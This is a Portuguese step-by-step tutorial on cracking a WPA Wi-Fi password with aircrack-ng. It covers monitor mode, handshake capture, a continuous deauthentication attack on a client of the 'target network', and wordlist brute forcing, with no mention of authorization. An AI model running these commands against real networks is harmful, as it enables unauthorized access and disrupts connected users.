Neste procedimento vamos abordar de forma rápida:
- Monitoramento de uma Rede Wi-fi
- Captura de pacotes de autenticação
- Uso de Brute Force para descobrir a senha.
O que é o Aircrack-ng
Aircrack-ng é um conjunto completo de ferramentas para avaliar a segurança da rede WiFi.
Concentra-se em diferentes áreas de segurança Wi-Fi:
- Monitoramento: a captura de pacotes e exportação de dados para arquivos de texto para processamento adicional por ferramentas de terceiros.
- Atacando: ataques replay, deauthentication, pontos de acesso falsos e outros através de injeção de pacote.
- Teste: verificar cartões Wi-Fi e capacidades do driver (captura e injeção).
- Cracking: WEP e WPA PSK (WPA 1 e 2).
Todas as ferramentas são a linha de comando que permite a criação de scripts pesados. Um monte de GUIs têm aproveitado esse recurso. Ele trabalha principalmente
Linux, mas também o Windows, OS X, FreeBSD, OpenBSD, NetBSD, bem como Solaris e até mesmo eComStation 2.
Vamos iniciar!
Descubra qual e a interface de rede que sua placa wifi esta utilizando:
iwconfig
Você deve ter algo tipo wlan0, wlp4s0 etc.
Vamos finalizar quaisquer processos que possam causar problemas no modo monitor:
# airmon-ng check kill
Agora vamos iniciar o modo monitor:
# airmon-ng start wlan0
Obs.: wlan0 varia de acordo com sua interface de rede.
Após iniciar no modo monitor uma nova interface é carregada no modo monitor, algo tipo mon0, mon1...
Agora vamos verificar quais são as redes disponíveis:
# airodump-ng mon0
O que interessa aqui é o CHANNEL e a BSSID da rede.
Agora vamos direcionar o airodump-ng para capturar os pacotes referentes a rede desejada.
Usaremos o comando abaixo:
# airodump-ng -c 6 --bssid 80:C6:AB:53:9C:99 -w arquivo mon0
Sendo:
- -c 6 > canal 6
- --bssid > endereco mac do modem da rede alvo
- -w > referente a write (gravar), irá gravar o arquivo da captura de pacotes
- mon1 > endereco da sua placa de rede wifi (do seu computador etc)
Enquanto o terminal está aberto com com o programa acima em execução, você já esta capturando handshakes, que são pacotes de autenticação da rede.
O programa captura este handshake para que possamos usá-lo para forçar autenticação através de brute force. Mas este handshake só e capturado quando um dos clientes da rede se conecta ou reconecta a rede.
Caso isso seja difícil, você pode forçar um dos clientes a se reautenticar à rede, ou seja, se reconectar.
Para forçar a reautenticação:
# aireplay-ng -0 0 -a 80:C6:AB:53:9C:99 -c A8:9F:BA:02:3C:99 mon1
Sendo:
- -0 > Desautenticacao
- 0 > Número infinito de injeções
- -a > MAC do roteador Wifi da rede alvo
- -c > MAC de um dos clientes da rede alvo
Terminadas as capturas, você irá descobrir se conseguiu capturar um handshake através do programa aircrack-ng.
Vamos iniciar o ataque Brute Force, na rede alvo, para descobrir a senha:
# aircrack-ng arquivo-01.cap -w numeros.txt
Sendo:
- arquivo-01.cap > handshake capturado
- -w numeros.txt > indica a wordlist a ser usada
Obs.: deve ser informado com o caminho completo da wordlist, caso esteja em outra pasta. A wordlist citada aqui você já deve ter visto como criar a sua você mesmo neste tutorial.
Após concluído o procedimento, você dever ter uma mensagem retornando com a senha da rede, indicando Key Found, traduzido, chave encontrada!
O procedimento pode demorar de acordo com:
- O nível de dificuldade da senha
- A qualidade do sinal
- E o tamanho da wordlist utilizada